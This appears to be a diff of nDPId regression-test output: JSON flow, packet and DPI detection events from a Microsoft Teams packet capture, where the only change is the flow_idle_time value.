00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041690915,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.79.138.41"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690916,"flow_last_seen":1587041690916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041690916,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1587041690916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041690916,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyUAbup7MP+AAAAALAC\/\/9nAwAAAgQFtAEDAwUBAQgKMITPEwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041690946,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GwdAAG4GfY4oT4opwKgBBgG77JSCI5UvqezD\/6ASIAArFwAAAgQFoAEDAwgEAggKUvjCpTCEzxM="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041690946,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyUAbup7MP\/giOVMIAQEAlpqQAAAQEICjCEzzFS+MKl"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690916,"flow_last_seen":1587041690916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041690916,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1587041690916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041690916,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyUAbup7MP+AAAAALAC\/\/9nAwAAAgQFtAEDAwUBAQgKMITPEwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1587041690946,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041690946,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GwdAAG4GfY4oT4opwKgBBgG77JSCI5UvqezD\/6ASIAArFwAAAgQFoAEDAwgEAggKUvjCpTCEzxM="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1587041690946,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041690946,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyUAbup7MP\/giOVMIAQEAlpqQAAAQEICjCEzzFS+MKl"} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1587041691075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1587041691075,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZLy0AAP8RCQ\/AqAEGwKgBAfWPADUARdrUdPIBAAABAAAAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="} 00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1587041691148,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1587041691148,"pkt":"KDc3AG3IEBMx8Tl2CABFAACQrGdAADkREZ7AqAEBwKgBBgA19Y8AfAAAdPKBgAABAAIAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAADwAGw9tc2dhcGktcHJvZC1zZnIIY2xvdWRhcHDANMBJAAEAAQAAAAoABDRybAg="} 00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041691148,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.108.8"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691149,"flow_last_seen":1587041691149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041691149,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1587041691149,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041691149,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2I\/AqAEGNHJsCOyVAbumbhw9AAAAALAC\/\/8jXgAAAgQFtAEDAwUBAQgKMITP9QAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1587041691168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041691168,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PCRAAHEGa280cmwIwKgBBgG77JWud4Fgpm4cPqASIABnNAAAAgQFoAEDAwgEAggKUqoqrDCEz\/U="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041691169,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2JvAqAEGNHJsCOyVAbumbhw+rneBYYAQEAml0QAAAQEICjCE0AhSqiqs"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691149,"flow_last_seen":1587041691149,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041691149,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1587041691149,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041691149,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2I\/AqAEGNHJsCOyVAbumbhw9AAAAALAC\/\/8jXgAAAgQFtAEDAwUBAQgKMITP9QAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1587041691168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041691168,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PCRAAHEGa280cmwIwKgBBgG77JWud4Fgpm4cPqASIABnNAAAAgQFoAEDAwgEAggKUqoqrDCEz\/U="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1587041691169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041691169,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2JvAqAEGNHJsCOyVAbumbhw+rneBYYAQEAml0QAAAQEICjCE0AhSqiqs"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041691410} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691399,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041691611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691582,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692528,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1587041692528,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1587041692528,"pkt":"KDc3AG3IEBMx8Tl2CABFAACscMtAADIGTDyXCzKLwKgBBgiu1d6yibcLw8sjj4AYAfWSMAAAAQEICnMgXuAwhCbwdBDZH1X2LNSHenV0XPT5UOuNQPq3DAtDODIIsZ4L3xE8W9ceOtMh\/taRn1i3oYCG\/lk5DiXu3JH7RFT8gb0ANFHp9LfVVHPD+A0sB0\/WJaUdO\/QQPvH9sYa9nCylNS5SUfWnuhHHtKPL+2Ql1DSrQI\/KjFfe6Sr3"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2439,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAA0AABAAEAGrzfAqAEGlwsyi9XeCK7DyyOPsom3g4AQD\/zTvAAAAQEICjCE1UVzIF7g"} -00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2440,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAB8AABAAEAGru\/AqAEGlwsyi9XeCK7DyyOPsom3g4AYEADukgAAAQEICjCE1UVzIF7g5AplDBJ5jEkO1U2Mpra9\/PbG6UC\/FVXGQ5pEnr4zSbP3LnLXhdyZOGgH9qsJLTZHLgDXKr5t+q9K3Mvbm5JFapBhK16BH5zD"} +00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692528,"flow_last_seen":1587041692528,"flow_idle_time":7560000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1587041692528,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1587041692528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1587041692528,"pkt":"KDc3AG3IEBMx8Tl2CABFAACscMtAADIGTDyXCzKLwKgBBgiu1d6yibcLw8sjj4AYAfWSMAAAAQEICnMgXuAwhCbwdBDZH1X2LNSHenV0XPT5UOuNQPq3DAtDODIIsZ4L3xE8W9ceOtMh\/taRn1i3oYCG\/lk5DiXu3JH7RFT8gb0ANFHp9LfVVHPD+A0sB0\/WJaUdO\/QQPvH9sYa9nCylNS5SUfWnuhHHtKPL+2Ql1DSrQI\/KjFfe6Sr3"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2439,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1587041692528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAA0AABAAEAGrzfAqAEGlwsyi9XeCK7DyyOPsom3g4AQD\/zTvAAAAQEICjCE1UVzIF7g"} +00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2440,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1587041692528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAB8AABAAEAGru\/AqAEGlwsyi9XeCK7DyyOPsom3g4AYEADukgAAAQEICjCE1UVzIF7g5AplDBJ5jEkO1U2Mpra9\/PbG6UC\/FVXGQ5pEnr4zSbP3LnLXhdyZOGgH9qsJLTZHLgDXKr5t+q9K3Mvbm5JFapBhK16BH5zD"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2442,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041692611} 